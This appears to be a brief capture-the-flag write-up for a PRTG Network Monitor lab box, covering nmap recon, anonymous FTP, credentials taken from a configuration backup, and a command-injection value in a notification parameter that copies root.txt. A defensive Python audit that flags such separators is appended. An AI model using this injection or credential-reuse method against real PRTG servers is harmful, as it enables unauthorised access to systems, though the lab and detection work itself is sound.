root@blog:~#

neymon

RECON

PRTG Network Monitor

Nmap Scan

nmap -sC -sV 10.10.10.152

Anonymous FTP login allowed

ENUMERATION

FTP

ftp 10.10.10.152

User Flag

ls
cd Users/Public
get user.txt

Privilege Escalation

Looking through Config files

User and password in PRTG Configuration.old.bak

Log into Netmon using 2019 for updated credentials (box release year)

Root Flag

Looking for PRTG Network Monitor vulnerabilities

Blog post about exploitation method

Add Notification: Setup > Account Settings > Notifications

PowerShell to transfer

Formatting transfer

test.txt;Copy-Item "C:\Users\Administrator\Desktop\root.txt" -Destination "C:\Users\Public\root.txt"

Anonymous FTP successful transfer
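The notification parameter above works because a `;` outside quotes ends one PowerShell statement and starts another. As an added example (not part of the original post, and not PRTG code), this audit flags notification parameter values that carry unquoted statement separators. It assumes the parameter text reaches a PowerShell command line, and the function names and sample entries are constructed for illustration.

```python
# Added example: audit notification parameter strings for PowerShell
# statement separators or subexpressions that are not neutralised by quoting.
# Assumption: the parameter text ends up on a PowerShell command line.

SEPARATORS = {";", "|", "&", "\n"}


def find_unquoted_separators(param: str):
    """Return [(index, token)] for separators outside quotes and for
    $( subexpressions anywhere except inside single quotes."""
    hits = []
    quote = None  # None, "'" or '"'
    for i, ch in enumerate(param):
        if quote == "'":
            # Single quotes are literal in PowerShell: nothing expands.
            if ch == "'":
                quote = None
            continue
        if ch == "$" and param[i + 1:i + 2] == "(":
            # $( ... ) is evaluated bare and inside double quotes.
            hits.append((i, "$("))
        elif quote == '"':
            if ch == '"':
                quote = None
        elif ch in ('"', "'"):
            quote = ch
        elif ch in SEPARATORS:
            hits.append((i, ch))
    return hits


def audit(params: dict):
    """Map notification name -> findings, keeping only flagged entries."""
    flagged = {}
    for name, value in params.items():
        hits = find_unquoted_separators(value)
        if hits:
            flagged[name] = hits
    return flagged


# Constructed sample data; the second value is the parameter shown on this page.
SAMPLE = {
    "plain": "%device %name %status",
    "page-example": r'test.txt;Copy-Item "C:\Users\Administrator\Desktop\root.txt" -Destination "C:\Users\Public\root.txt"',
    "quoted-semicolon": '-Message "disk full; check host"',
}

if __name__ == "__main__":
    for name, hits in audit(SAMPLE).items():
        print(f"{name}: {hits}")
```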
